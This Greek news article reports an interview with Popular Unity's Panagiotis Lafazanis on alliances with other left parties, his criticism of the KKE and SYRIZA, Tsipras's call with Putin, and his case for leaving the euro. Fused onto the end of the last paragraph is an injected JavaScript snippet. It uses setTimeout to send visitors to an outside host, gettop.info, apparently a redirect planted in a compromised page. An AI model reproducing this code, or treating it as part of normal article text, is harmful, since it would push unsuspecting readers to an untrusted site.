Λαφαζάνης: Ο Τσίπρας δεν σκεφτόταν την έξοδο από το ευρώ

0
7

 

Έτοιμη να συνεργαστεί με όλες τις αριστερές, πατριωτικές, αντιμνημονιακές δυνάμει είναι η Λαϊκή Ενότητα όπως δήλωσε ο γραμματέας της Πολιτικού Συμβουλίου, Παναγιώτης Λαφαζάνης, μιλώντας στο Κόντρα Channel. Μάλιστα, ο κ. Λαφαζάνης είπε ότι συζητεί με την Πλεύση Ελευθερίας της Ζωής Κωνσταντοπούλου για το ενδεχόμενο εκλογικής συνεργασίας. Επίσης, άσκησε κριτική στο ΚΚΕ για τη στάση που κρατά, αποφεύγοντας τις συνεργασίες αλλά και γενικότερα για την πολιτική του γραμμή που θέτει σαν προϋπόθεση «τη σοσιαλιστική επανάσταση», ενώ πιο αυστηρή κριτική άσκησε κατά του ΣΥΡΙΖΑ για τον οποίο είπε ότι έχει εξελιχθεί σε ένα «αρχηγικό κόμμα» και ότι με το 2ο Συνέδριο επισφράγησε την απομάκρυνση από τις αριστερές αρχές και καταβολές του.

Ο κ. Λαφαζάνης παραδέχθηκε ότι κατά τη διάρκεια του Συμβουλίου των Πολιτικών Αρχηγών μετά το κρίσιμο δημοψήφισμα, μετέβη στο Προεδρικό Μέγαρο και επιβεβαίωσε ότι η σύσκεψη διακόπηκε για να μιλήσει τηλεφωνικά ο πρωθυπουργός με τον πρόεδρο της Ρωσίας Βλαντίμιρ Πούτιν. Διευκρίνισε πάντως ότι δεν άκουσε τη συνομιλία του πρωθυπουργού, ενώ υποστήριξε ότι ο κ. Τσίπρας δεν ζήτησε από τον κ. Πούτιν να τυπώσει εθνικό νόμισμα στη Ρωσία, αφού κατά τη γνώμη του «ο κ. Τσίπρας δεν σκεπτόταν την έξοδο από το ευρώ».

ΕΠιπλέον, εμφανίστηκε βέβαιος ότι σε περίπτωση που γίνουν εκλογές η ΛΑΕ, θα μπει «θριαμβευτικά στη Βουλή». Εκτίμησε δε ότι οι κοινωνικές συνθήκες ωριμάζουν και όσο τα πράγματα παραμένουν άσχημα για τις λαϊκές τάξεις, δεν αποκλείεται να υπάρξουν ακόμη και ανεξέλεγκτες κοινωνικές αντιδράσεις στο εγγύς μέλλον. Είπε, ακόμα, ότι η Ευρωπαϊκή Ένωση είναι συνολικά σε κρίση και απειλείται με διάλυση, ισχυρίστηκε ότι υπάρχουν πολλά ευρώ, και επανέλαβε τη βεβαιότητά του ότι η μόνη λύση για τη χώρα είναι η έξοδος από την ευρωζώνη και η επιστροφή σε εθνικό νόμισμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here